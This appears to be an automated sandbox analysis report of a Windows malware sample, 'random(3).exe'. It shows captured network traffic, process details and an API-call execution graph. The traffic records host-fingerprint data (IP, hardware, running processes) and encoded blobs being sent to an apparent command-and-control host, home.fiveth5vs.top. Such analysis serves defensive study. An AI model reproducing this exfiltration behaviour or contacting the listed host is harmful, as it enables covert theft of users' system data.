                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 35 30 36 35 31 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914506517", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                              Jan 2, 2025 09:15:21.049280882 CET4944OUTData Raw: 38 4e 43 53 52 51 79 32 55 61 79 62 49 5c 2f 4d 79 54 78 6b 34 4b 7a 52 71 47 49 72 34 5c 2f 49 35 54 61 39 6e 5c 2f 62 57 46 68 53 6f 79 58 57 63 38 58 67 61 2b 59 59 4c 44 51 53 73 33 50 47 59 6e 44 71 32 75 76 4c 4c 6c 39 37 50 76 41 4c 78 43
                                              Data Ascii: 8NCSRQy2UaybI\/MyTxk4KzRqGIr4\/I5Ta9n\/bWFhSoyXWc8Xga+YYLDQSs3PGYnDq2uvLLl97PvALxCyWMp4bD5bxHCmr1f8AV\/GVK1eL+zCngczwuV5hi6ktVGGBwmKldWaTlHm+OqK7rxl8MviB8PXiHjPwhrmgW9zKYbHU7yxkbQ9VdU8wnRtft\/P0TWowmW87Sr+8hwr\/ALzKMBwtfqOExmEx9CnisDisPjMNVV6W
                                              Jan 2, 2025 09:15:21.049314976 CET4944OUTData Raw: 78 2b 76 38 41 6e 69 6f 63 66 77 66 78 2b 56 35 55 76 37 72 5c 2f 41 4a 64 5c 2f 38 39 50 54 46 64 42 6f 51 2b 5a 75 5c 2f 77 42 73 53 52 66 76 66 74 48 2b 66 38 50 61 68 59 35 39 75 38 66 50 35 6e 37 71 55 66 38 41 4c 66 38 41 7a 78 32 5c 2f 6e
                                              Data Ascii: x+v8Aniocfwfx+V5Uv7r\/AJd\/89PTFdBoQ+Zu\/wBsSRfvftH+f8PahY59u8fP5n7qUf8ALf8Azx2\/nT5NhCJ\/HHLz5f5en+fxp8mdru\/yP\/0zi\/x\/H3oOgptHzs3x\/X\/P6de1QsXk2Jn8fK\/w\/wA\/Wrk0f7zZzs8rzf8AHHT+tU\/9Wu90jfy\/9afN\/p0\/D8qDSn1+X6jPMT5E37P3v\/PX9wP9F\/8A1c
                                              Jan 2, 2025 09:15:21.049415112 CET4944OUTData Raw: 4e 6a 38 66 4e 48 33 76 35 66 68 7a 55 72 43 79 65 34 54 57 39 48 73 53 30 32 6f 58 57 67 2b 4d 6b 67 65 35 38 4b 77 52 43 37 75 70 39 54 61 37 38 4b 77 54 61 6a 71 32 6c 54 74 4c 5c 2f 6e 7a 6d 76 41 4f 66 59 58 4b 63 78 34 71 79 37 77 30 79 5c
                                              Data Ascii: Nj8fNH3v5fhzUrCye4TW9HsS02oXWg+Mkge58KwRC7up9Ta78KwTajq2lTtL\/nzmvAOfYXKcx4qy7w0y\/F8KUuMMZwlgMeq\/FdfF4rFU8bUwWFmsNR4jjUrUa2JhDLo4ylQWFqZpL6hTccRJUV\/q5lPiBkGLzbLuFcw8TMxwvFlXg\/BcX5hgfY8J0cJhcLVwVLG4qH1itw5OlSr0cNOeYPBVa8sVTypfX6l8PF1XLrOt+M
                                              Jan 2, 2025 09:15:21.049555063 CET9888OUTData Raw: 6e 38 4f 50 38 6d 6d 53 74 2b 37 33 76 38 41 39 5c 2f 50 38 39 4f 63 66 34 56 4e 5c 2f 72 50 34 5c 2f 2b 32 66 5c 2f 41 4e 62 2b 58 38 71 59 77 33 53 4f 2b 79 50 48 2b 66 77 35 35 5c 2f 38 41 31 30 47 68 57 32 37 6f 2b 54 35 66 61 4b 4c 7a 66 2b
                                              Data Ascii: n8OP8mmSt+73v8A9\/P89Ocf4VN\/rP4\/+2f\/ANb+X8qYw3SO+yPH+fw55\/8A10GhW27o+T5faKLzf+Xj8f6d+1Qt8io7plOvmeV+P\/6qtIdv7v8A6Zeb5nP+f89KRv8AWf7Bi\/1cef8APbvQaU+vy\/Urbf4+np5kv41Wb+F8xh\/9b\/n+f+TVll3cD534iik6+d9j9Pw\/KmNHy\/8AH\/n8+v6UHR7Ty\/H\/AIBW+
                                              Jan 2, 2025 09:15:21.054253101 CET4944OUTData Raw: 48 2b 72 38 37 38 7a 2b 48 62 6a 30 71 65 64 2b 58 39 66 4d 37 43 6e 38 6a 62 50 34 78 5c 2f 50 2b 76 38 41 6b 39 65 36 79 66 33 74 38 66 37 79 55 65 62 4a 5c 2f 6e 46 4f 7a 6a 65 76 5c 2f 50 4c 5c 2f 41 4f 74 54 4d 66 75 33 66 64 76 66 7a 66 30
                                              Data Ascii: H+r878z+Hbj0qed+X9fM7Cn8jbP4x\/P+v8Ak9e6yf3t8f7yUebJ\/nFOzjev\/PL\/AOtTMfu3fdvfzf0\/l\/j9a1Nedef9fMYeV3pNGn\/LHy\/8P6\/0pjb\/ADP77x\/88\/8AP496mxjfh\/8At38rPk\/y9\/8AJpknlrs\/1nmd44+On+f\/AK9BZW7lCm9Mf6z\/AD\/nv0JqFo\/n8nZ5zyf9t\/fj\/P1q42zZ9+
                                              Jan 2, 2025 09:15:21.054337025 CET7416OUTData Raw: 68 37 43 56 73 62 52 77 47 45 79 4b 76 54 56 66 44 5a 74 68 63 64 58 78 32 4c 70 77 79 6a 4a 36 32 49 79 5c 2f 45 4e 35 4c 78 42 50 44 35 52 57 7a 50 43 34 71 70 67 38 47 38 66 4c 47 75 72 2b 35 6e 78 41 5c 2f 34 4b 78 36 56 34 32 5c 2f 5a 33 2b
                                              Data Ascii: h7CVsbRwGEyKvTVfDZthcdXx2LpwyjJ62Iy\/EN5LxBPD5RWzPC4qpg8G8fLGur+5nxA\/4Kx6V42\/Z3+Inhrwp4e8ZfCr466lL4U1LwprAv8AS\/HfhZL7SvE\/hCTVlj1XWbSPUrcXHh\/SNSeGz1vQdYiEk0ls+ryM1uR8YeKf+ClP7VHjj4a+MPhX438ReFPFHh7xx4Y1DwrrV1d+DdI0vWEsNUtWs7m4sbrw0uh20N8Ii
                                              Jan 2, 2025 09:15:21.054361105 CET2472OUTData Raw: 5c 2f 41 45 4e 4e 77 5c 2f 76 2b 66 5c 2f 31 36 32 39 5c 2f 2b 37 2b 4a 6f 55 39 76 6c 5c 2f 6f 63 5c 2f 79 70 61 6c 6b 36 4a 39 44 5c 2f 4f 6f 71 6f 37 76 66 5c 2f 75 5c 2f 69 51 79 39 5c 2f 77 44 64 5c 2f 77 41 61 5a 77 77 39 6a 55 7a 39 50 78
                                              Data Ascii: \/AENNw\/v+f\/1629\/+7+JoU9vl\/oc\/ypalk6J9D\/Ooqo7vf\/u\/iQy9\/wDd\/wAaZww9jUz9Px\/oaioKK\/l7PfPf+nao5O34\/wBKtP8AdP4fzFQ1n7Pz\/D\/gnQV6jk7fj\/Sp26L9P6CmVmdBHJ2\/H+lR1YqNm7D8T\/hQbe\/\/AHfxKdQv94\/h\/IVdYFvzzUew+3+fwoN6dT9bO2\/9f151Kjl++f8APc
                                              Jan 2, 2025 09:15:21.095346928 CET34608OUTData Raw: 36 5c 2f 30 39 71 68 6b 58 7a 57 33 37 49 33 7a 47 66 33 63 6d 66 38 5c 2f 35 39 71 50 66 5c 2f 75 5c 2f 69 42 44 5c 2f 79 7a 66 38 41 38 69 64 50 2b 33 54 72 5c 2f 6e 38 63 55 7a 2b 4c 62 5c 2f 72 6f 66 4e 5c 2f 35 35 66 36 67 39 66 38 41 50 31
                                              Data Ascii: 6\/09qhkXzW37I3zGf3cmf8\/59qPf\/u\/iBD\/yzf8A8idP+3Tr\/n8cUz+Lb\/rofN\/55f6g9f8AP171c8yZpHTOBJJ\/q4\/+WP0\/zz9RTJGT5\/k\/6ZS\/4fX35NT7Pz\/D\/gnQVpI3Xa\/7x4+nP4en4n370za+2H5Cj\/6qWT\/21\/l\/nirRV\/MTf5n+u\/5Zy\/uP\/rVHtffvf5D53lfvP+Wv8vp1\/nR7P
                                              Jan 2, 2025 09:15:21.147200108 CET1236OUTData Raw: 6e 55 56 42 70 54 36 5c 2f 4c 39 53 4a 30 32 5c 2f 79 35 71 4c 59 76 70 5c 2f 50 5c 2f 41 42 71 31 56 65 67 31 75 31 74 64 44 57 58 64 2b 46 51 31 59 71 4a 6c 78 79 4f 6e 38 71 44 63 68 66 70 2b 50 39 44 55 56 57 4b 68 66 37 78 5c 2f 44 2b 51 6f
                                              Data Ascii: nUVBpT6\/L9SJ02\/y5qLYvp\/P\/ABq1Veg1u1tdDWXd+FQ1YqJlxyOn8qDchfp+P9DUVWKhf7x\/D+QoNYbfP9ENqOTt+P8ASpKjk7fj\/SgsjpGBb880nz\/7P60fP\/s\/rQdA3y\/f9P8A69QeX82O2env6f8A1\/8A9dW6ryL2H1H+FBcN\/l+qK9G3dxipPL9\/0\/8Ar0eX7\/p\/9eg6Od+X9fMr+X7\/AKf\/AF6j
                                              Jan 2, 2025 09:15:21.195266008 CET1236OUTData Raw: 2f 7a 30 34 5c 2f 7a 6e 48 34 65 74 4d 6b 66 35 66 4d 6b 54 66 6e 5c 2f 41 4a 61 53 66 5c 2f 57 39 76 38 39 36 75 53 66 4c 5c 2f 75 66 38 73 6f 35 59 76 38 6a 5c 2f 41 43 61 68 32 66 63 54 5a 73 37 66 35 5c 2f 7a 5c 2f 41 46 7a 50 73 5c 2f 50 38
                                              Data Ascii: /z04\/znH4etMkf5fMkTfn\/AJaSf\/W9v896uSfL\/uf8so5Yv8j\/ACah2fcTZs7f5\/z\/AFzPs\/P8P+CdntPL8f8AgEUmz5\/9X7f\/AFvf696q\/wCrO\/ZG\/wD00\/5YH\/P+H4XDs\/v73k\/5aR\/9fWP\/ANXv060xo0j3749mT\/rJMc\/\/AF\/Sj2fn+H\/BNKX2fn+pQkkdlP8AcGPK\/n\/nmib955yOn\/
                                              Jan 2, 2025 09:15:24.683518887 CET138INHTTP/1.1 200 OK
                                              server: nginx/1.22.1
                                              date: Thu, 02 Jan 2025 08:15:24 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1
                                              Data Raw: 30
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.749728176.53.146.223807608C:\Users\user\Desktop\random(3).exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:15:25.627867937 CET98OUTGET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                                              Host: home.fiveth5vs.top
                                              Accept: */*
                                              Jan 2, 2025 09:15:26.480895996 CET353INHTTP/1.1 404 NOT FOUND
                                              server: nginx/1.22.1
                                              date: Thu, 02 Jan 2025 08:15:26 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 207
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                              Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.749739176.53.146.223807608C:\Users\user\Desktop\random(3).exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:15:27.331262112 CET171OUTPOST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                              Host: home.fiveth5vs.top
                                              Accept: */*
                                              Content-Type: application/json
                                              Content-Length: 31
                                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                              Data Ascii: { "id1": "0", "data": "Done1" }
                                              Jan 2, 2025 09:15:28.344898939 CET353INHTTP/1.1 404 NOT FOUND
                                              server: nginx/1.22.1
                                              date: Thu, 02 Jan 2025 08:15:28 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 207
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                              Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.74970734.200.57.1144437608C:\Users\user\Desktop\random(3).exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-02 08:15:17 UTC52OUTGET /ip HTTP/1.1
                                              Host: httpbin.org
                                              Accept: */*
                                              2025-01-02 08:15:17 UTC224INHTTP/1.1 200 OK
                                              Date: Thu, 02 Jan 2025 08:15:17 GMT
                                              Content-Type: application/json
                                              Content-Length: 31
                                              Connection: close
                                              Server: gunicorn/19.9.0
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              2025-01-02 08:15:17 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                              Data Ascii: { "origin": "8.46.123.189"}


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              System Behavior

                                              General

                                              Target ID:3
                                              Start time:03:15:13
                                              Start date:02/01/2025
                                              Path:C:\Users\user\Desktop\random(3).exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\random(3).exe"
                                              Imagebase:0xc50000
                                              File size:4'487'680 bytes
                                              MD5 hash:C2968F40E6C44036E1D3E18BCA61C67D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:2.2%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:18.6%
                                                Total number of Nodes:274
                                                Total number of Limit Nodes:44
                                                execution_graph 65208 d05a50 65209 d05ea0 65208->65209 65210 d05a58 65208->65210 65213 d05b50 65210->65213 65220 d05a99 65210->65220 65223 d05b88 65210->65223 65211 d05e96 65238 d19480 closesocket 65211->65238 65214 d05eb4 65213->65214 65215 d05b7a 65213->65215 65213->65223 65239 d06f10 socket ioctlsocket connect getsockname closesocket 65214->65239 65229 d070a0 65215->65229 65218 d05ec2 65218->65218 65221 d070a0 6 API calls 65220->65221 65220->65223 65236 d06f10 socket ioctlsocket connect getsockname closesocket 65220->65236 65221->65220 65223->65211 65225 d1a920 65223->65225 65237 d19320 closesocket 65223->65237 65226 d1a944 65225->65226 65227 d1a94b 65226->65227 65228 d1a977 send 65226->65228 65227->65223 65228->65223 65232 d070ae 65229->65232 65231 d071a7 65231->65223 65232->65231 65233 d0717f 65232->65233 65240 d1a8c0 65232->65240 65244 d071c0 socket ioctlsocket connect getsockname 65232->65244 65233->65231 65245 d19320 closesocket 65233->65245 65236->65220 65237->65223 65238->65209 65239->65218 65241 d1a903 recvfrom 65240->65241 65242 d1a8e6 65240->65242 65243 d1a8ed 65241->65243 65242->65241 65242->65243 65243->65232 65244->65232 65245->65231 65422 1104370 65424 110439a 65422->65424 65423 11043a6 65424->65423 65434 fe12c0 65424->65434 65426 11043e6 65427 11043da 65427->65426 65428 1104490 65427->65428 65429 1104446 65427->65429 65438 fdb500 _lock 65428->65438 65430 1104484 65429->65430 65439 fdb500 _lock 65429->65439 65432 11044b9 65435 fe12cc 65434->65435 65440 fde050 65435->65440 65437 fe12fa 65437->65427 65438->65432 65439->65432 65443 fde09d 65440->65443 65441 fdfeb6 isxdigit 65441->65443 65442 fde18e 65442->65437 65443->65441 65443->65442 65444 c6d5e0 65445 c6d652 WSAStartup 65444->65445 65446 c6d5f0 65444->65446 65445->65446 65246 c8b3c0 65247 c8b3cb 65246->65247 65248 c8b3ee 65246->65248 65252 c576a0 65247->65252 65256 c89290 65247->65256 65249 c8b3ea 65253 c576e6 send 65252->65253 65254 c576c0 65252->65254 65255 c576c9 65253->65255 65254->65253 65254->65255 65255->65249 65257 c576a0 send 65256->65257 65258 c892e5 65257->65258 65259 c89392 65258->65259 65260 c89335 WSAIoctl 65258->65260 65259->65249 65260->65259 65261 c89366 65260->65261 65261->65259 65262 c89371 setsockopt 65261->65262 65262->65259 65263 c8e400 65264 c8e412 65263->65264 65266 c8e459 65263->65266 65267 c868b0 closesocket 65264->65267 65267->65266 65268 c8b400 65269 c8b40b 65268->65269 65270 c8b425 65268->65270 65273 c57770 65269->65273 65271 c8b421 65274 c577b6 recv 65273->65274 65275 c57790 65273->65275 65276 c57799 65274->65276 65275->65274 65275->65276 65276->65271 65277 c513c9 65280 c51160 65277->65280 65281 c513a1 65280->65281 65282 fd93e0 65280->65282 65292 fd8a20 isxdigit _lock 65280->65292 65289 fd9400 65282->65289 65291 fd93f3 65282->65291 65283 fd9688 65285 fd96c7 65283->65285 65283->65291 65293 fd9280 vfprintf 65283->65293 65294 fd9220 vfprintf 65285->65294 65287 fd96df 65287->65280 65288 fd9280 vfprintf 65288->65289 65289->65283 65289->65285 65289->65288 65290 fd9220 vfprintf 65289->65290 65289->65291 65290->65289 65291->65280 65292->65280 65293->65283 65294->65287 65447 d04720 65449 d04728 65447->65449 65448 d04733 65449->65448 65458 d0476c 65449->65458 65459 d05540 closesocket 65449->65459 65451 d04774 65453 d0482e 65453->65458 65460 d09270 65453->65460 65455 d04860 65465 d04950 65455->65465 65457 d04878 65458->65457 65473 d030a0 closesocket 65458->65473 65459->65453 65474 d0a440 65460->65474 65462 d09297 65464 d092ab 65462->65464 65507 d0bbe0 closesocket 65462->65507 65464->65455 65466 d04966 65465->65466 65470 d049c5 65466->65470 65472 d049b9 65466->65472 65509 d0b590 if_indextoname 65466->65509 65468 d04a3e 65468->65470 65510 d0bbe0 closesocket 65468->65510 65469 d04aa0 gethostname 65469->65470 65469->65472 65470->65458 65472->65469 65472->65470 65473->65451 65503 d0a46b 65474->65503 65475 d0a4db 65476 d0aa03 RegOpenKeyExA 65475->65476 65491 d0ad14 65475->65491 65477 d0ab70 RegOpenKeyExA 65476->65477 65478 d0aa27 RegQueryValueExA 65476->65478 65481 d0ac34 RegOpenKeyExA 65477->65481 65499 d0ab90 65477->65499 65479 d0aa71 65478->65479 65480 d0aacc RegQueryValueExA 65478->65480 65479->65480 65487 d0aa85 RegQueryValueExA 65479->65487 65483 d0ab66 RegCloseKey 65480->65483 65484 d0ab0e 65480->65484 65482 d0acf8 RegOpenKeyExA 65481->65482 65502 d0ac54 65481->65502 65485 d0ad56 RegEnumKeyExA 65482->65485 65482->65491 65483->65477 65484->65483 65490 d0ab1e RegQueryValueExA 65484->65490 65486 d0ad9b 65485->65486 65485->65491 65488 d0ae16 RegOpenKeyExA 65486->65488 65489 d0aab3 65487->65489 65492 d0ae34 RegQueryValueExA 65488->65492 65493 d0addf RegEnumKeyExA 65488->65493 65489->65480 65494 d0ab4c 65490->65494 65491->65462 65495 d0af43 RegQueryValueExA 65492->65495 65506 d0adaa 65492->65506 65493->65488 65493->65491 65494->65483 65496 d0b052 RegQueryValueExA 65495->65496 65495->65506 65497 d0adc7 RegCloseKey 65496->65497 65496->65506 65497->65493 65499->65481 65500 d0a794 GetBestRoute2 65500->65503 65501 d0afa0 RegQueryValueExA 65501->65506 65502->65482 65503->65475 65503->65500 65504 d0a6c7 GetBestRoute2 65503->65504 65505 d0a520 65503->65505 65504->65503 65505->65475 65508 d0b830 if_indextoname 65505->65508 65506->65495 65506->65496 65506->65497 65506->65501 65507->65464 65508->65475 65509->65468 65510->65472 65295 d1a080 65298 d19740 65295->65298 65297 d1a09b 65299 d19780 65298->65299 65303 d1975d 65298->65303 65300 d19925 RegOpenKeyExA 65299->65300 65299->65303 65301 d1995a RegQueryValueExA 65300->65301 65300->65303 65302 d19986 RegCloseKey 65301->65302 65302->65303 65303->65297 65304 d1b180 65305 d1b2e3 65304->65305 65306 d1b19b 65304->65306 65306->65305 65309 d1b2a9 getsockname 65306->65309 65311 d1b020 closesocket 65306->65311 65312 d1af30 65306->65312 65316 d1b060 65306->65316 65321 d1b020 65309->65321 65311->65306 65313 d1af63 socket 65312->65313 65314 d1af4c 65312->65314 65313->65306 65314->65313 65315 d1af52 65314->65315 65315->65306 65318 d1b080 65316->65318 65317 d1b0b0 connect 65319 d1b0bf WSAGetLastError 65317->65319 65318->65317 65318->65319 65320 d1b0ea 65318->65320 65319->65318 65319->65320 65320->65306 65322 d1b052 65321->65322 65323 d1b029 65321->65323 65322->65306 65324 d1b04b closesocket 65323->65324 65325 d1b03e 65323->65325 65324->65322 65325->65306 65326 c531d7 65329 c531f4 65326->65329 65327 c53200 65328 c532dc CloseHandle 65328->65327 65329->65327 65329->65328 65330 c52f17 65337 c52f2c 65330->65337 65331 c531d3 65332 c52fb3 RegOpenKeyExA 65332->65337 65333 c5315c RegEnumKeyExA 65333->65337 65334 c53046 RegOpenKeyExA 65335 c53089 RegQueryValueExA 65334->65335 65334->65337 65336 c5313b RegCloseKey 65335->65336 65335->65337 65336->65337 65337->65331 65337->65332 65337->65333 65337->65334 65337->65336 65338 c88b50 65339 c88b6b 65338->65339 65340 c88bb5 65338->65340 65339->65340 65341 c88b8f 65339->65341 65342 c88bf3 65339->65342 65377 c66e40 select 65341->65377 65358 c8a550 65342->65358 65345 c88bfc 65345->65340 65349 c88c1f connect 65345->65349 65350 c88c35 65345->65350 65351 c88cb2 65345->65351 65346 c88ba1 65346->65340 65347 c88cd9 SleepEx getsockopt 65346->65347 65346->65351 65352 c88d18 65347->65352 65348 c8a150 getsockname 65357 c88dff 65348->65357 65349->65350 65373 c8a150 65350->65373 65351->65340 65351->65348 65351->65357 65352->65351 65353 c88d43 65352->65353 65356 c8a150 getsockname 65353->65356 65356->65340 65357->65340 65378 c578b0 closesocket 65357->65378 65359 c8a575 65358->65359 65363 c8a597 65359->65363 65380 c575e0 65359->65380 65361 c578b0 closesocket 65362 c8a713 65361->65362 65362->65345 65364 c8a811 setsockopt 65363->65364 65369 c8a83b 65363->65369 65372 c8a69b 65363->65372 65364->65369 65366 c8af56 65367 c8af5d 65366->65367 65366->65372 65367->65362 65368 c8a150 getsockname 65367->65368 65368->65362 65371 c8abe1 65369->65371 65369->65372 65386 c86be0 select closesocket 65369->65386 65371->65372 65385 cb67e0 ioctlsocket 65371->65385 65372->65361 65372->65362 65374 c8a15f 65373->65374 65376 c8a1d0 65373->65376 65375 c8a181 getsockname 65374->65375 65374->65376 65375->65376 65376->65346 65377->65346 65379 c578c5 65378->65379 65379->65340 65381 c57607 socket 65380->65381 65382 c575ef 65380->65382 65383 c5762b 65381->65383 65382->65381 65384 c57643 65382->65384 65383->65363 65384->65363 65385->65366 65386->65371 65387 c5255d 65388 fd9f70 65387->65388 65389 c5256c GetSystemInfo 65388->65389 65390 c52589 65389->65390 65391 c525a0 GlobalMemoryStatusEx 65390->65391 65396 c525ec 65391->65396 65392 c52762 65395 c527d6 KiUserCallbackDispatcher 65392->65395 65393 c5263c GetDriveTypeA 65394 c52655 GetDiskFreeSpaceExA 65393->65394 65393->65396 65394->65396 65397 c527f8 65395->65397 65396->65392 65396->65393 65398 c528d9 FindFirstFileW 65397->65398 65399 c52906 FindNextFileW 65398->65399 65400 c52928 65398->65400 65399->65399 65399->65400 65511 c895b0 65512 c895c8 65511->65512 65514 c895fd 65511->65514 65513 c8a150 getsockname 65512->65513 65512->65514 65513->65514 65515 c529ff FindFirstFileA 65516 c52a31 65515->65516 65517 c52a5c RegOpenKeyExA 65516->65517 65518 c52a93 65517->65518 65519 c52ade CharUpperA 65518->65519 65520 c52b0a 65519->65520 65521 c52bf9 QueryFullProcessImageNameA 65520->65521 65522 c52c3b CloseHandle 65521->65522 65523 c52c64 65522->65523 65524 c52df1 CloseHandle 65523->65524 65525 c52e23 65524->65525 65401 c53d5e 65402 c53d30 65401->65402 65402->65401 65404 c53d90 65402->65404 65405 c60ab0 65402->65405 65408 c605b0 65405->65408 65407 c60acd 65407->65402 65409 c605bd 65408->65409 65411 c607c7 65408->65411 65410 c607ef 65409->65410 65409->65411 65412 c60707 WSAEventSelect 65409->65412 65414 c576a0 send 65409->65414 65410->65411 65416 c60847 65410->65416 65418 c66fa0 65410->65418 65411->65407 65412->65409 65412->65411 65414->65409 65415 c609e8 WSAEnumNetworkEvents 65415->65416 65417 c609d0 WSAEventSelect 65415->65417 65416->65411 65416->65415 65416->65417 65417->65415 65417->65416 65419 c66fd4 65418->65419 65421 c66feb 65418->65421 65420 c67207 select 65419->65420 65419->65421 65420->65421 65421->65416

                                                Executed Functions

                                                Function 00C8F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
